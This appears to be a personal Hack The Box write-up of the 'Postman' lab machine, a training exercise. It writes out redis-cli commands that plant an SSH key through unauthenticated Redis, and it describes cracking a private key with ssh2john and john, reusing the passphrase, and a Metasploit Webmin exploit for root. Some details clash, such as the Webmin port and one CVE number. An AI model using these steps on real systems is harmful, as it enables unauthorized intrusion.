POSTMAN (HTB) - JA Smith

# Lessons Learned - Don't fully trust Google AI Overview or Bing suggestions - Blog posts are more accurate - When checking service versions for exploits, search with Google, `searchsploit`, and `msf` - Sometime the webserver is a dead-end > know when to move onto another service - we can always revisit it later - If we are getting errors using `id_rsa` or the like, review the basics like file ownership - Maybe we need to add `sudo` to run the command --- # After-Action Attack Sequence - Rare services on box: redis and webmin - Leverage null authentication to `redis` version 4.0.9 to write an ssh pubkey to `/var/lib/redis/.ssh/authorized_keys` - `redis` is an in-memory key-value db/cache - This gives us access to the box as the `redis` user - From here we find a clue in `.bash_history` that the Matt user stored `id_rsa.bak` somewhere - Locate `id_rsa.bak` and notice that it is encrypted with DES - Crack the passphrase for `id_rsa.bak` using `ssh2john` and `john` - When we try to use the privkey to connect via ssh, we get auto disconnects - Reuse the passphrase for `su Matt` > works - This gives us `user.txt` - Reuse the passphrase to access webmin - Search for vulns associated withe version 1.910 - Run the `msf` module associated with CVE-2019-12840 - Make sure to enable the SSL flag because we are accessing the webmin service via https --- # Discover Ports & Services - `ping` test ![[images/Pasted image 20260317181555.png]] - `nmap` scan - light ![[images/Pasted image 20260317181609.png]] - `nmap` scan - detailed ![[images/Pasted image 20260317182057.png]] - `nmap` scan - udp ![[images/Pasted image 20260317200736.png]] --- # Service Enum ## Port 80: Apache httpd 2.4.29 - Visit page ![[images/Pasted image 20260317182748.png]] - Note: `postman@htb` - View source - View request:response in `burp` ![[images/Pasted image 20260317183120.png]] - No `robots.txt`; no `sitemap.xml` - `whatweb` scan ![[images/Pasted image 20260317183223.png]] - Web fuzzing - directory - raft-medium ![[images/Pasted image 20260317183541.png]] - 2.3-medium ![[images/Pasted image 20260317193816.png]] - subdomain - 5000 ![[images/Pasted image 20260317193942.png]] - 20000 ![[images/Pasted image 20260317195434.png]] - vhost - 20000 ![[images/Pasted image 20260317195829.png]] - FUZZ.html - 2.3-medium ![[images/Pasted image 20260317201251.png]] --- ## Port 1000: Webmin 1.910 - CVEs - CVE-2024-12828: authenticated command injection - CVE-2019-15107: unauthenticated RCE in `password_change.cgi` - Visit page ![[images/Pasted image 20260317193615.png]] - Visit `https://10.129.2.1:10000/password_change.cgi` ![[images/Pasted image 20260317194454.png]] - View source ![[images/Pasted image 20260317194528.png]] - According to above page source this is Webmin 1.910 on Postman (Ubuntu Linux 18.04.3) - Maybe password reset is disabled? ![[images/Pasted image 20260317195343.png]] - Also try [ruthvikvegunta/CVE-2019-15107: Webmin <=1.920 RCE](https://github.com/ruthvikvegunta/CVE-2019-15107) - No dice > password reset must be disabled ![[images/Pasted image 20260317200230.png]] - Got blocked after trying some common credential combos ![[images/Pasted image 20260317201648.png]] - Looks like it was a timeout and not a full block --- ## Port 6379: Redis db 4.0.9 - Connect with `redis-cli` - Note: redis version 4.0.9 - We can access anonymously ```bash redis-cli -h 10.129.2.1 -p 6379 ``` ![[images/Pasted image 20260317202143.png]] - Enumerate with `use auxiliary/scanner/redis/redis_server` module within `msf` - This is just the output from `INFO` command - Google "redis 4.0.9 abuse anonymous access" - Looks like we can inject an SSH key? --- # Foothold > Port 6379: `redis` ## Attempt 1 - Create SSH key pair ![[images/Pasted image 20260317203844.png]] - Add newline padding to pubkey for proper parsing - Run following commands after redis null auth ```bash SET crackit "pub.key" CONFIG SET dir /root/.ssh/ CONFIG SET dbfilename "authorized_keys" SAVE ``` - Looks like we do not have write access to `/root/.ssh/` ![[images/Pasted image 20260317205711.png]] - Determine current directory and db ![[images/Pasted image 20260317205345.png]] - We have access to `/var/lib/redis` - Try commands again with writable dir above ```bash SET crackit "pub.key" CONFIG SET dir /var/lib/redis/.ssh CONFIG SET dbfilename "authorized_keys" SAVE ``` ![[images/Pasted image 20260317205557.png]] - Falling back to password auth for SSH and asking for redis password --- ## Attempt 2 - Create key pair > do not deviate from defautl naming convention ![[images/Pasted image 20260317211316.png]] - Run redis commands again - Try commands again with writable dir above ```bash redis-cli -h 10.129.2.1 flushall SET crackit "pwn.txt" CONFIG SET dir /var/lib/redis/.ssh CONFIG SET dbfilename "authorized_keys" SAVE ``` - Getting an SSH error `Load key "id_rsa": Permission denied` when we review verbose output - Maybe it's because `root` is the owner for `id_rsa`? - Let's append `sudo` and if that doesn't work `chown` to `jacob` ![[images/Pasted image 20260317212558.png]] - OK, we are in now --- ## Internal Enum - Light enum ![[images/Pasted image 20260317212817.png]] - We need redis's password for `sudo -l` - Review `.bash_history` ![[images/Pasted image 20260317212752.png]] - Let's hunt down `id_rsa.bak` ![[images/Pasted image 20260317213110.png]] - This is promising - We need a passphrase ![[images/Pasted image 20260317213257.png]] - Move `linpeas.sh` to target - Not much - Note: kept hanging on cloud check - Workaround: Use `-o` flag and remove cloud from comma separated list of checks --- ## Brute Force SSH Key - Convert matt's id_rsa to a hash with `ssh2john` and attempt to crack ![[images/Pasted image 20260317221730.png]] - That cracks; see local file for passphrase - When attempting to connect via ssh, the connection closes when I enter the passphrase - Alternative, reuse passphrase for `su Matt` while logged in as `redis` - That works - Also, try reusing the passphrase to log into webmin as `Matt:passphrase` - We are in ![[images/Pasted image 20260317223000.png]] - Note: Webmin ver. 1.910, and Authentic Theme ver. 19.33 --- # Privesc - Let's look at `searchsploit` ![[images/Pasted image 20260318191810.png]] - This PoC notes a different CVE than I found earlier: CVE-2019-12840 ![[images/Pasted image 20260318192010.png]] - Let's run the `msf` and search on webmin ![[images/Pasted image 20260318192341.png]] - We get some errors at first but needed to set the SSL flag to true ![[images/Pasted image 20260318193451.png]]